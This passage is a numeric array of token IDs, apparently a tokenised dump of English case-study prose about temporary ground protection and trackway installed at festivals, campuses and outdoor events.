310, 12729, 28488, 304, 443, 1359, 278, 29452, 29872, 3829, 322, 2304, 23330, 29889, 19814, 10852, 16311, 2130, 471, 18853, 363, 278, 1462, 27801, 322, 1014, 8078, 943, 304, 3386, 322, 2669, 278, 14837, 8497, 29452, 29872, 29892, 7146, 2183, 278, 7990, 14826, 2130, 322, 610, 9292, 363, 278, 28865, 471, 13877, 29889, 1152, 445, 18853, 664, 382, 9998, 13925, 5130, 29871, 29896, 29896, 29900, 29900, 29885, 30088, 310, 1009, 379, 735, 9321, 3234, 448, 3578, 29892, 25706, 322, 2221, 304, 2758, 363, 9416, 15376, 29892, 445, 471, 10839, 363, 1716, 3268, 2130, 322, 13047, 310, 278, 5962, 19540, 29892, 884, 14372, 385, 10839, 664, 7481, 363, 2304, 13925, 322, 19716, 13407, 29889, 379, 735, 9321, 471, 884, 1304, 2820, 278, 3268, 408, 2130, 304, 373, 3268, 610, 9292, 29892, 2183, 278, 8525, 4127, 310, 379, 735, 9321, 382, 9998, 892, 2221, 304, 2601, 5684, 805, 1295, 1283, 278, 1667, 6520, 982, 304, 3867, 322, 5256, 895, 278, 1353, 310, 610, 9292, 8162, 3625, 29889, 1094, 278, 7572, 9416, 17251, 8379, 322, 411, 3196, 1833, 11015, 5065, 5362, 9008, 5717, 29892, 372, 9098, 3897, 20295, 393, 5684, 13047, 471, 3734, 363, 278, 1746, 297, 607, 278, 18647, 892, 14089, 287, 29889, 11221, 393, 445, 471, 278, 1346, 29943, 2429, 388, 1434, 17661, 30024, 322, 716, 10961, 471, 3734, 373, 3268, 29892, 382, 9998, 8745, 304, 564, 3881, 363, 3196, 2319, 24413, 304, 6314, 322, 12021, 716, 3234, 1513, 304, 278, 3268, 29889, 382, 9998, 13925, 892, 6958, 287, 322, 11977, 373, 3268, 297, 931, 304, 2601, 29871, 29955, 29900, 29900, 29885, 30088, 310, 1009, 21121, 29899, 29909, 29899, 9588, 328, 3234, 304, 297, 29899, 5589, 322, 3867, 263, 9226, 610, 9292, 4038, 2629, 278, 6520, 805, 1295, 29889, 1094, 263, 2186, 6023, 29892, 382, 9998, 21050, 363, 1716, 278, 379, 735, 9321, 322, 21121, 29899, 29909, 29899, 9588, 328, 304, 367, 5941, 287, 773, 28310, 7901, 1022, 414, 322, 5375, 22588, 471, 2790, 515, 10426, 289, 1242, 414, 411, 373, 29899, 2746, 13925, 29889, 910, 9560, 1741, 3614, 2058, 411, 694, 298, 2335, 267, 515, 278, 14826, 322, 3969, 304, 382, 9998, 896, 892, 2221, 304, 1346, 5592, 598, 278, 289, 2426, 30010, 29879, 1999, 1878, 267, 30024, 29991, 13, 13, 2887, 278, 8236, 4266, 2879, 297, 2011, 519, 5685, 8253, 29892, 6864, 26043, 8253, 4956, 17925, 313, 29923, 9998, 29897, 19056, 322, 5130, 1009, 4866, 3464, 310, 5685, 8253, 6851, 363, 278, 10261, 29915, 29879, 8236, 18032, 3631, 7672, 262, 708, 29892, 21083, 322, 17888, 5786, 1510, 448, 365, 5194, 1529, 472, 1570, 935, 445, 1629, 29889, 5853, 1135, 29871, 29946, 29892, 29945, 29900, 29900, 29885, 30088, 310, 379, 735, 9321, 471, 5130, 408, 4805, 7463, 6520, 1994, 25236, 278, 29452, 267, 304, 278, 1667, 6686, 1994, 21109, 884, 13138, 2898, 13407, 10161, 2820, 278, 3268, 29889, 19814, 785, 297, 19163, 310, 29871, 29896, 29892, 29900, 29900, 29900, 29885, 30088, 310, 278, 4266, 391, 21121, 29899, 29909, 29899, 2605, 30342, 5685, 8253, 471, 4944, 322, 5130, 408, 263, 2898, 13407, 4038, 322, 6686, 1582, 2820, 15028, 363, 20330, 1316, 408, 29892, 6015, 294, 29892, 2259, 897, 406, 322, 19259, 3122, 29889, 9788, 382, 9998, 4944, 29130, 1559, 10963, 292, 785, 363, 901, 1135, 29871, 29955, 29900, 15028, 785, 1716, 1399, 29877, 943, 322, 5377, 29889, 13, 13, 26222, 1449, 591, 892, 4433, 304, 3867, 322, 2601, 13201, 6686, 1994, 322, 2898, 13407, 10161, 363, 278, 17568, 17274, 17661, 9999, 29889, 15950, 8688, 278, 5912, 363, 278, 9999, 3196, 2440, 8020, 29892, 591, 526, 2337, 15319, 287, 304, 367, 4433, 304, 22332, 1296, 445, 5566, 11407, 10982, 573, 2060, 29889, 1094, 263, 4797, 902, 16639, 3268, 372, 338, 12187, 393, 2861, 2562, 29892, 8570, 322, 21749, 335, 663, 338, 12530, 304, 278, 18830, 10161, 1716, 2629, 278, 15194, 25502, 322, 884, 278, 17647, 292, 17161, 575, 29889, 1334, 4629, 382, 9998, 21121, 29899, 29909, 29899, 2605, 30342, 408, 278, 10839, 1650, 363, 445, 3008, 1129, 446, 11161, 2629, 278, 4629, 10161, 29892, 12566, 292, 278, 25502, 310, 445, 15839, 3268, 322, 14372, 2130, 363, 8939, 342, 374, 550, 322, 24413, 394, 9345, 29889, 10781, 11161, 4902, 363, 278, 21121, 29899, 29909, 29899, 2605, 30342, 3234, 526, 408, 4477, 13018, 10266, 23732, 278, 15194, 25502, 29892, 591, 19056, 322, 5130, 29871, 29906, 29892, 29941, 29900, 29900, 29885, 30088, 607, 6364, 278, 425, 1233, 287, 4038, 322, 884, 4944, 263, 6686, 1582, 304, 916, 6003, 1041, 29889, 10266, 1152, 278, 1663, 2247, 310, 278, 16538, 29452, 267, 297, 278, 18830, 15971, 575, 591, 5130, 29871, 29941, 29953, 29900, 29885, 30088, 10266, 19814, 591, 12341, 29871, 29945, 29900, 29900, 29885, 30088, 2820, 278, 18830, 10161, 408, 13201, 6686, 1994, 29889, 2973, 975, 29871, 29906, 29945, 29900, 29892, 29900, 29900, 29900, 2305, 1098, 2548, 278, 17661, 28794, 975, 29871, 29946, 3841, 297, 5846, 29892, 17274, 338, 17878, 408, 278, 10150, 17661, 1741, 310, 967, 2924, 29889, 13, 13, 2831, 445, 1629, 30010, 29879, 17568, 27690, 17661, 9999, 591, 892, 4433, 491, 22679, 262, 28488, 304, 3867, 12566, 573, 5685, 8253, 363, 1716, 2768, 322, 5377, 310, 278, 15194, 3013, 29889, 8680, 9316, 12520, 13047, 363, 278, 25502, 322, 425, 1233, 29879, 21109, 884, 13138, 9109, 6686, 1994, 10106, 278, 3268, 29889, 1152, 278, 2048, 701, 310, 278, 29452, 267, 322, 2498, 2130, 10161, 591, 19056, 322, 5130, 29871, 29945, 29900, 29900, 29885, 30088, 310, 379, 735, 9321, 785, 445, 471, 18425, 5377, 310, 278, 15194, 19152, 29889, 806, 16613, 2629, 278, 15194, 14603, 29892, 363, 278, 380, 497, 8948, 414, 29892, 22684, 414, 322, 26824, 29892, 591, 19056, 322, 5130, 29871, 29896, 29892, 29946, 29900, 29900, 29885, 30088, 310, 1749, 21121, 29899, 29909, 29899, 2605, 30342, 3234, 29889, 450, 17568, 3436, 16837, 17661, 383, 388, 276, 297, 8591, 677, 338, 5439, 408, 278, 1900, 27690, 1510, 297, 278, 2982, 411, 975, 29871, 29896, 29900, 29900, 380, 4293, 269, 7807, 4259, 284, 330, 17741, 411, 263, 8359, 27690, 21054, 473, 29889, 910, 1629, 30010, 29879, 4723, 355, 1741, 13978, 287, 901, 4696, 29892, 1375, 303, 2674, 29879, 29892, 2778, 29878, 2073, 322, 286, 7515, 1135, 3926, 1434, 322, 471, 8959, 263, 2107, 7539, 363, 599, 310, 278, 3942, 29892, 731, 2629, 278, 3144, 23308, 25502, 310, 278, 27690, 8591, 677, 15194, 29889, 13, 13, 4806, 892, 15319, 287, 304, 367, 15074, 363, 278, 1473, 1629, 2734, 278, 8078, 304, 3867, 263, 1650, 363, 278, 29871, 29929, 386, 17568, 17661, 383, 388, 276, 297, 350, 2857, 624, 28925, 29879, 29889, 450, 6282, 391, 8034, 313, 1595, 310, 278, 9820, 820, 18701, 511, 6958, 287, 502, 411, 21778, 304, 12566, 292, 278, 22879, 425, 1233, 29879, 322, 17161, 575, 29892, 13138, 11904, 10161, 363, 380, 4293, 322, 22684, 414, 29892, 21109, 1985, 1090, 22261, 931, 4128, 29889, 21121, 29899, 29909, 29899, 2605, 30342, 471, 4629, 408, 278, 1556, 15031, 322, 1224, 24285, 3234, 363, 11161, 322, 318, 572, 2027, 29889, 512, 3001, 29871, 29896, 29892, 29955, 29900, 29900, 29885, 30088, 310, 278, 3234, 471, 5130, 12566, 292, 278, 17455, 515, 8939, 342, 6392, 3661, 6416, 322, 11302, 15028, 29889, 450, 931, 5626, 892, 12187, 363, 278, 18701, 2183, 393, 278, 4423, 471, 2629, 278, 1976, 22072, 14603, 373, 278, 425, 1233, 29879, 322, 17161, 575, 988, 694, 28310, 534, 2707, 29879, 470, 363, 6321, 17741, 892, 6068, 29889, 450, 301, 3818, 750, 304, 367, 7522, 443, 15638, 491, 29871, 29953, 626, 29892, 411, 278, 10961, 769, 8608, 287, 373, 5112, 1026, 534, 2707, 29879, 4822, 278, 1667, 6520, 322, 964, 278, 17161, 575, 7536, 304, 278, 14218, 364, 1878, 7234, 29889, 1152, 278, 318, 572, 2027, 310, 21121, 29899, 29909, 29899, 2605, 30342, 1919, 278, 3815, 4687, 664, 472, 29871, 29929, 3358, 322, 29892, 411, 278, 18872, 310, 5685, 397, 4366, 29879, 29892, 1985, 1549, 278, 4646, 896, 8745, 304, 505, 278, 736, 301, 3818, 4309, 11932, 322, 2665, 3448, 491, 29871, 29953, 314, 29889, 350, 2857, 624, 28925, 29879, 17661, 383, 388, 276, 756, 1661, 29899, 9847, 22684, 358, 363, 2211, 3841, 411, 1784, 1422, 6471, 29892, 12462, 322, 1373, 1907, 15859, 29889, 450, 17661, 383, 388, 276, 338, 1286, 13834, 363, 967, 22684, 358, 29889, 2973, 1023, 22950, 29892, 4344, 30010, 29879, 22684, 358, 322, 11952, 22684, 414, 29892, 727, 338, 1554, 363, 14332, 29889, 13, 13, 29923, 9998, 892, 22314, 304, 664, 29892, 373, 2306, 3131, 310, 278, 951, 293, 4156, 22186, 30010, 29879, 8034, 304, 11421, 322, 2601, 975, 29871, 29896, 29892, 29900, 29900, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 30342, 363, 278, 1083, 1590, 11115, 2669, 472, 278, 3362, 19722, 297, 951, 293, 4156, 30010, 29879, 14212, 4815, 29889, 12206, 385, 373, 3268, 11781, 8859, 297, 278, 1629, 29892, 382, 9998, 892, 2221, 304, 2874, 278, 5994, 398, 6216, 363, 278, 2669, 322, 281, 276, 493, 6568, 292, 29889, 739, 9615, 278, 1900, 671, 310, 21121, 29899, 29909, 29899, 2605, 304, 367, 12341, 2629, 278, 4038, 4944, 29889, 21121, 29899, 29909, 29899, 2605, 30342, 471, 4629, 515, 278, 289, 2205, 292, 1889, 408, 1641, 278, 1556, 3438, 11828, 322, 25706, 3234, 3625, 363, 445, 1741, 29889, 450, 1820, 1203, 3145, 892, 304, 3867, 263, 9109, 7481, 363, 278, 2669, 408, 1532, 408, 12566, 292, 278, 2626, 9020, 17161, 575, 322, 25502, 29889, 2973, 975, 29871, 29941, 29892, 29945, 29900, 29900, 27138, 1098, 2548, 298, 962, 1983, 322, 12475, 414, 892, 13625, 322, 1497, 411, 22314, 25808, 550, 13407, 23468, 304, 23468, 411, 4123, 13840, 1691, 1090, 263, 27592, 7254, 14744, 304, 5146, 1009, 3390, 29879, 304, 19225, 13936, 29889, 13, 13, 2831, 278, 1473, 1629, 2734, 382, 9998, 892, 10658, 491, 18076, 568, 6125, 669, 18189, 19806, 304, 11421, 322, 6216, 278, 5685, 8253, 4038, 2629, 278, 14574, 30010, 29879, 15967, 537, 4038, 472, 278, 7786, 29871, 29906, 29900, 29896, 29906, 27884, 29010, 29427, 297, 4517, 30010, 29879, 438, 29906, 26053, 29889, 910, 1741, 338, 278, 24842, 1399, 16946, 22556, 14743, 297, 278, 3186, 23425, 2864, 557, 27467, 554, 586, 293, 29892, 14159, 7351, 261, 29892, 21828, 22340, 322, 263, 17173, 310, 916, 10819, 29889, 450, 2060, 9701, 6568, 292, 8112, 2779, 13848, 2904, 297, 1716, 278, 7412, 414, 301, 1309, 479, 322, 27144, 13926, 29889, 910, 5722, 1711, 18066, 292, 664, 9701, 21224, 292, 278, 13848, 2904, 304, 278, 282, 16239, 5685, 8253, 322, 28967, 2820, 1784, 22549, 1503, 304, 278, 18378, 2874, 19056, 29889, 450, 664, 471, 8676, 975, 29871, 29906, 3841, 304, 9025, 278, 6216, 714, 304, 2125, 2058, 29889, 5677, 6764, 3439, 11869, 785, 15197, 14650, 15629, 363, 382, 9998, 19952, 29892, 26622, 29943, 2952, 292, 1749, 2847, 664, 411, 18076, 568, 297, 29871, 29906, 29900, 29896, 29896, 372, 471, 2107, 304, 367, 337, 29899, 29874, 1328, 287, 278, 6958, 363, 29871, 29906, 29900, 29896, 29906, 363, 445, 544, 5286, 2738, 14743, 322, 9849, 293, 6003, 434, 29889, 1094, 263, 5001, 591, 505, 21633, 16951, 2645, 1749, 937, 1629, 322, 12312, 5381, 763, 445, 28281, 393, 591, 505, 278, 9316, 322, 2669, 393, 278, 9999, 23347, 322, 6858, 3178, 13, 13, 5531, 292, 373, 2306, 3131, 310, 29258, 8037, 19806, 29892, 6864, 26043, 8253, 4956, 17925, 313, 29923, 9998, 29897, 505, 4944, 13201, 5685, 8253, 363, 278, 8408, 9735, 1218, 3088, 8518, 29889, 450, 16005, 6057, 15050, 4515, 3250, 29871, 29941, 29896, 5533, 2745, 24211, 29871, 29941, 3979, 29889, 382, 9998, 2825, 263, 1985, 17132, 363, 385, 1616, 293, 7964, 301, 3818, 773, 29871, 29896, 29941, 29900, 29885, 30088, 310, 1009, 379, 735, 9321, 3234, 3412, 411, 13138, 13201, 6686, 1994, 322, 12708, 2130, 10161, 10106, 278, 19133, 25502, 773, 29871, 29946, 29900, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 30342, 869, 9134, 9316, 3867, 10839, 9109, 5685, 8253, 23136, 607, 884, 13138, 10839, 13047, 363, 278, 25502, 6053, 29889, 382, 9998, 15197, 14650, 15629, 5677, 6764, 3439, 11869, 19952, 1346, 4013, 338, 263, 716, 2060, 363, 502, 322, 591, 526, 15319, 287, 393, 1749, 9316, 892, 10434, 3178, 940, 2715, 1346, 4013, 338, 278, 1369, 310, 263, 19587, 2846, 7378, 363, 382, 9998, 322, 591, 1106, 6375, 304, 901, 16984, 28602, 1907, 363, 1749, 3234, 3464, 8643, 910, 674, 367, 3088, 30010, 29879, 10150, 8408, 9735, 1218, 3088, 8518, 3447, 29892, 411, 419, 287, 713, 13423, 830, 29872, 1960, 2183, 263, 3889, 20913, 304, 443, 280, 1161, 670, 6425, 18245, 322, 2320, 936, 907, 800, 297, 278, 8442, 310, 3088, 29889, 9208, 1629, 30010, 29879, 1741, 4446, 29871, 29953, 29900, 29892, 29900, 29900, 29900, 2305, 285, 908, 304, 278, 16005, 29892, 322, 408, 1532, 408, 2211, 2919, 6287, 410, 24247, 29892, 278, 24662, 936, 17161, 575, 674, 884, 367, 6296, 304, 2320, 936, 2834, 773, 24233, 1230, 3578, 292, 2820, 10697, 322, 18577, 29889, 450, 3088, 6838, 15971, 575, 505, 1063, 27615, 964, 263, 3006, 263, 1037, 2320, 936, 4997, 1049, 363, 278, 736, 310, 8408, 9735, 1218, 3088, 29889, 6804, 278, 2030, 3186, 28103, 716, 29892, 408, 278, 447, 348, 1259, 368, 9560, 5796, 1144, 310, 624, 6182, 30010, 29879, 1976, 22072, 29892, 278, 380, 27389, 4024, 1943, 310, 278, 3088, 11750, 6838, 322, 760, 310, 278, 4412, 399, 4293, 3867, 278, 3239, 29879, 304, 2211, 2919, 6287, 28967, 7636, 410, 24247, 29889, 13, 13, 11667, 16575, 28794, 2180, 17274, 17661, 9999, 1833, 1629, 29892, 591, 12341, 975, 29871, 29906, 29892, 29945, 29900, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 30342, 304, 12566, 278, 25502, 2629, 278, 20610, 515, 278, 1880, 3661, 11950, 975, 278, 29871, 29946, 3841, 310, 278, 1741, 322, 884, 3994, 1711, 2645, 278, 3268, 7632, 322, 766, 29899, 29885, 424, 1847, 29889, 8591, 677, 383, 388, 276, 1334, 892, 4433, 304, 3867, 1716, 1749, 21121, 29899, 29909, 29899, 2605, 30342, 322, 379, 735, 9321, 9316, 363, 1833, 2440, 1741, 472, 8591, 677, 3436, 16837, 17661, 383, 388, 276, 297, 1383, 307, 28401, 29889, 350, 2857, 624, 28925, 29879, 1152, 1833, 2440, 1741, 29892, 591, 12341, 29871, 29896, 29892, 29946, 29900, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 30342, 363, 278, 380, 4293, 322, 22684, 414, 408, 1532, 408, 12566, 292, 278, 22879, 17161, 575, 29889, 17661, 26998, 390, 19363, 8680, 4402, 9127, 29899, 1627, 287, 9416, 13360, 1559, 10963, 338, 1641, 1304, 472, 975, 29871, 29941, 29900, 714, 17433, 26998, 390, 19363, 599, 975, 278, 10261, 445, 17661, 13, 13, 4806, 892, 26733, 491, 278, 17459, 414, 310, 445, 29871, 29941, 2462, 16005, 304, 1653, 13201, 8939, 342, 6392, 2130, 304, 278, 14089, 297, 4275, 350, 28836, 29889, 2973, 17251, 29821, 579, 363, 29871, 29906, 310, 278, 3841, 372, 471, 27131, 304, 12566, 278, 25502, 322, 3867, 263, 9109, 2130, 6520, 29889, 382, 9998, 13925, 5130, 29871, 29896, 29900, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 30342, 869, 450, 16005, 15000, 278, 736, 310, 382, 1859, 322, 278, 350, 5963, 28438, 322, 471, 263, 19417, 714, 363, 278, 29871, 29941, 3841, 411, 17202, 310, 15319, 287, 16005, 748, 414, 29889, 13, 13, 2831, 263, 2024, 6263, 472, 445, 9849, 293, 322, 5412, 4423, 373, 278, 696, 29877, 615, 459, 310, 278, 2030, 350, 935, 414, 3787, 297, 5057, 7103, 476, 575, 4885, 29892, 382, 1555, 345, 28488, 4433, 502, 304, 11421, 322, 6216, 263, 4796, 1559, 10963, 373, 2246, 310, 278, 5923, 1559, 10963, 287, 10161, 29889, 28265, 8296, 4796, 278, 1559, 10963, 884, 750, 304, 367, 6364, 1156, 11161, 322, 7536, 304, 278, 6263, 304, 2758, 8078, 943, 304, 2130, 322, 664, 373, 278, 6263, 2048, 701, 29889, 1334, 19056, 1749, 8037, 8594, 1974, 2379, 271, 1559, 10963, 411, 263, 1248, 1541, 1600, 13047, 7546, 10959, 29936, 445, 1559, 10963, 471, 769, 10771, 304, 278, 5923, 1559, 10963, 773, 1749, 382, 9998, 7714, 13777, 260, 4085, 29889, 11028, 304, 278, 4423, 322, 769, 304, 278, 17526, 2246, 3528, 338, 18066, 292, 541, 591, 892, 15319, 287, 411, 278, 2582, 29889, 13, 13, 29968, 314, 915, 28488, 10658, 502, 363, 278, 1473, 1629, 304, 3867, 322, 2601, 13201, 5685, 8253, 363, 278, 16005, 3268, 322, 4242, 292, 10161, 472, 27326, 3034, 845, 6573, 297, 4644, 314, 415, 787, 14812, 29889, 1152, 2498, 19716, 2130, 1716, 304, 322, 2820, 278, 3268, 591, 5130, 29871, 29896, 29900, 29953, 29900, 29885, 30088, 310, 379, 735, 9321, 1919, 445, 471, 884, 1304, 304, 1653, 263, 2898, 13407, 8406, 4815, 2629, 278, 25502, 310, 278, 12713, 29889, 1152, 278, 304, 488, 1372, 322, 1510, 414, 23330, 591, 5130, 29871, 29945, 29900, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 30342, 297, 29871, 29953, 5004, 14354, 2820, 278, 3268, 29889, 1383, 1117, 2883, 4893, 2058, 363, 29871, 29946, 3841, 975, 278, 10253, 4168, 22394, 4723, 355, 322, 5439, 491, 450, 25266, 408, 376, 797, 263, 18254, 15903, 29899, 4527, 657, 293, 29892, 1708, 1319, 29892, 10814, 29895, 414, 29892, 278, 8141, 936, 29892, 7933, 30024, 591, 892, 15319, 287, 304, 367, 2221, 304, 6985, 1449, 322, 1106, 6375, 304, 29871, 29906, 29900, 29896, 29941, 13, 13, 2744, 5684, 2009, 363, 445, 1741, 515, 1281, 6327, 315, 1915, 293, 471, 304, 12566, 278, 15141, 12341, 1559, 10963, 2629, 278, 897, 4526, 3921, 6573, 29889, 910, 1559, 10963, 3438, 292, 975, 15151, 29947, 29945, 29892, 29900, 29900, 29900, 1033, 451, 367, 6206, 322, 16005, 748, 414, 892, 3806, 304, 14333, 4959, 2629, 278, 12990, 2105, 1974, 29889, 1334, 6907, 1749, 315, 1008, 261, 383, 10102, 9869, 292, 408, 278, 1900, 2984, 29889, 450, 3234, 338, 2898, 591, 4362, 29892, 1652, 420, 3240, 538, 424, 322, 4780, 5941, 4796, 1248, 1541, 1600, 9869, 292, 607, 338, 385, 10839, 17407, 8671, 304, 13848, 2904, 5685, 8253, 29889, 1763, 4612, 278, 1559, 29886, 1691, 297, 278, 12713, 591, 19056, 322, 5130, 29871, 29941, 9679, 29879, 29871, 29906, 29885, 921, 29871, 29896, 29900, 29900, 29885, 607, 4944, 4866, 13047, 515, 278, 17439, 322, 2462, 304, 2462, 270, 2728, 29889, 13, 13, 29943, 2952, 292, 278, 2551, 310, 278, 29871, 29906, 29900, 29896, 29896, 13329, 12009, 3660, 16005, 29892, 1281, 6327, 315, 1915, 293, 4433, 502, 304, 3867, 1749, 13201, 5685, 8253, 9316, 363, 278, 29871, 29906, 29900, 29896, 29906, 1741, 29889, 16564, 472, 951, 293, 4156, 30010, 29879, 897, 4526, 3921, 12713, 445, 17568, 1510, 4893, 2058, 297, 263, 12875, 310, 963, 287, 29452, 267, 29892, 1667, 714, 17433, 7408, 322, 278, 12713, 3528, 29889, 1281, 6327, 315, 1915, 293, 5131, 278, 9316, 304, 367, 5130, 491, 1009, 1914, 13925, 322, 577, 16326, 310, 8744, 322, 11161, 471, 27131, 29889, 1152, 278, 6520, 1994, 2820, 278, 3268, 591, 4944, 29871, 29953, 29945, 29900, 29885, 30088, 310, 379, 735, 9321, 1919, 445, 6068, 8078, 943, 24413, 29892, 1741, 12469, 408, 1532, 408, 16005, 748, 414, 304, 4337, 2820, 278, 3268, 297, 15332, 29889, 19814, 372, 6364, 278, 25502, 310, 278, 22879, 12713, 322, 14089, 1049, 515, 19531, 322, 734, 279, 29889, 23732, 278, 4266, 391, 29452, 267, 322, 4802, 2246, 591, 4944, 29871, 29941, 29945, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 869, 450, 26718, 526, 5948, 304, 767, 7297, 4090, 276, 322, 2601, 607, 6985, 287, 278, 27081, 653, 13925, 1058, 12341, 278, 5685, 8253, 29889, 13329, 12009, 3660, 338, 385, 17568, 1741, 297, 951, 293, 4156, 30010, 29879, 1741, 17684, 29892, 4934, 975, 29871, 29946, 3841, 322, 445, 1629, 372, 13978, 287, 263, 1353, 310, 1880, 8722, 14741, 785, 11783, 5459, 29892, 21091, 1530, 473, 2522, 1600, 322, 5236, 7084, 19806, 29889, 13, 13, 29943, 2952, 292, 1784, 3517, 2440, 9150, 13047, 310, 278, 3014, 25502, 29892, 591, 892, 22301, 304, 367, 337, 29899, 29874, 1328, 287, 278, 8078, 363, 445, 4100, 17568, 10591, 362, 1741, 29889, 2973, 975, 29871, 29946, 29892, 29900, 29900, 29900, 8041, 263, 2462, 1098, 2548, 975, 263, 29871, 29946, 4723, 14385, 591, 19056, 322, 5130, 29871, 29896, 29892, 29945, 29900, 29900, 29885, 30088, 310, 379, 735, 9321, 1919, 29871, 29955, 29945, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 9588, 328, 322, 29871, 29945, 29900, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 30342, 869, 7806, 310, 1749, 25706, 9316, 471, 1925, 304, 1781, 671, 373, 278, 3014, 25502, 363, 13047, 29892, 610, 9292, 29892, 6520, 1994, 322, 6124, 635, 5685, 8253, 2629, 278, 2304, 29452, 267, 29889, 12206, 263, 4098, 30010, 29879, 4868, 17251, 278, 9316, 11827, 304, 367, 278, 10839, 13047, 363, 278, 25502, 322, 304, 6985, 411, 278, 4868, 12469, 785, 1716, 8939, 342, 6392, 322, 24413, 29889, 13, 13, 2887, 760, 310, 278, 1632, 13467, 362, 1741, 363, 278, 3014, 591, 892, 884, 4433, 304, 3867, 13047, 363, 278, 10325, 5130, 14717, 12713, 5685, 8253, 29889, 450, 11473, 515, 278, 3014, 471, 304, 12566, 278, 15141, 5130, 11904, 411, 263, 13907, 1559, 10963, 2594, 4336, 11480, 607, 409, 1218, 723, 367, 7180, 29889, 13, 13, 4013, 4768, 29899, 812, 950, 6121, 29130, 4934, 472, 9143, 2813, 20089, 719, 297, 5373, 486, 265, 29892, 15383, 1609, 11750, 6511, 1462, 27801, 304, 278, 20089, 719, 292, 13661, 278, 4922, 1346, 21713, 2787, 30024, 564, 2386, 304, 22222, 322, 27391, 1009, 9316, 29889, 910, 1629, 30010, 29879, 1741, 13978, 287, 975, 29871, 29896, 29955, 29892, 29900, 29900, 29900, 26824, 785, 263, 29871, 29896, 29900, 29995, 7910, 373, 9143, 2813, 29871, 29906, 29900, 29896, 29896, 29892, 10106, 278, 2211, 3841, 310, 278, 1510, 896, 18860, 901, 5735, 9004, 800, 322, 716, 8024, 669, 21083, 1135, 3926, 1434, 29892, 9132, 491, 263, 2407, 29871, 29946, 29945, 29929, 10371, 17259, 29889, 1334, 19056, 1749, 21121, 29899, 29909, 29899, 2605, 30342, 3234, 297, 445, 18066, 292, 5177, 304, 29871, 29896, 29946, 10371, 17259, 363, 671, 373, 322, 13138, 9109, 2130, 304, 1009, 15028, 29892, 6124, 635, 278, 3234, 471, 1304, 363, 2498, 2898, 13407, 10161, 29889, 13, 13, 1576, 9862, 15613, 382, 1111, 3699, 8688, 322, 4240, 491, 8041, 472, 278, 3014, 471, 2183, 967, 1914, 5412, 4423, 2629, 278, 25502, 29892, 1494, 263, 380, 524, 2629, 385, 29130, 5177, 29889, 450, 4038, 10434, 471, 3138, 29892, 2629, 3014, 14089, 1049, 29871, 29896, 29941, 29941, 29885, 515, 278, 20471, 6520, 411, 385, 1343, 457, 310, 975, 29871, 29906, 29906, 29885, 29889, 1763, 2601, 278, 878, 1070, 2729, 3699, 11480, 967, 716, 4038, 723, 1996, 29871, 29946, 5004, 1616, 293, 7964, 301, 3818, 15376, 322, 263, 13714, 4038, 363, 263, 10426, 274, 10800, 304, 21994, 29889, 24176, 411, 278, 2661, 1078, 14311, 591, 892, 4433, 304, 3867, 263, 13201, 3234, 607, 723, 451, 871, 2758, 2130, 363, 278, 274, 10800, 322, 6942, 24413, 541, 723, 884, 12566, 278, 25502, 19540, 29889, 1334, 5130, 29871, 29953, 29900, 29900, 29885, 30088, 310, 379, 735, 9321, 322, 1879, 29877, 341, 1590, 10800, 304, 3867, 278, 13201, 6520, 1582, 322, 1985, 7481, 29889, 12206, 263, 4098, 30010, 29879, 4868, 17251, 278, 9316, 11827, 304, 367, 278, 10839, 13047, 363, 278, 25502, 322, 892, 4996, 322, 4780, 304, 2601, 322, 3349, 29889, 13, 13, 2887, 760, 310, 1009, 21955, 272, 3527, 310, 278, 29871, 29906, 29900, 29896, 29906, 19025, 12482, 29892, 315, 6400, 1530, 29874, 21050, 263, 3652, 310, 714, 17433, 13135, 29879, 2820, 278, 10261, 29889, 4525, 3889, 3697, 15000, 16984, 14741, 408, 4485, 390, 787, 265, 29892, 2812, 5037, 3087, 311, 29892, 1260, 6619, 360, 1507, 1992, 322, 360, 466, 911, 29872, 25351, 1052, 2504, 11427, 278, 8090, 29889, 1334, 892, 6958, 287, 491, 951, 5779, 18701, 304, 3867, 263, 5685, 8253, 1650, 363, 278, 3268, 1716, 4565, 310, 3699, 322, 884, 1250, 7408, 29889, 1094, 1716, 310, 278, 10161, 892, 304, 367, 5130, 491, 1887, 13925, 372, 471, 4100, 304, 3867, 263, 2560, 322, 4780, 304, 671, 1788, 29889, 1152, 278, 1250, 19190, 10161, 591, 19056, 29871, 29896, 29900, 29900, 29885, 30088, 310, 21121, 29899, 29909, 29899, 2605, 30342, 363, 6686, 1994, 322, 363, 278, 1667, 4038, 591, 19056, 29871, 29953, 29900, 29900, 29885, 30088, 310, 379, 735, 9321, 411, 1879, 29877, 3813, 10800, 304, 12566, 278, 5962, 29889, 9134, 4452, 892, 5130, 322, 6206, 491, 450, 951, 5779, 8831, 28488, 8583, 29889 ]
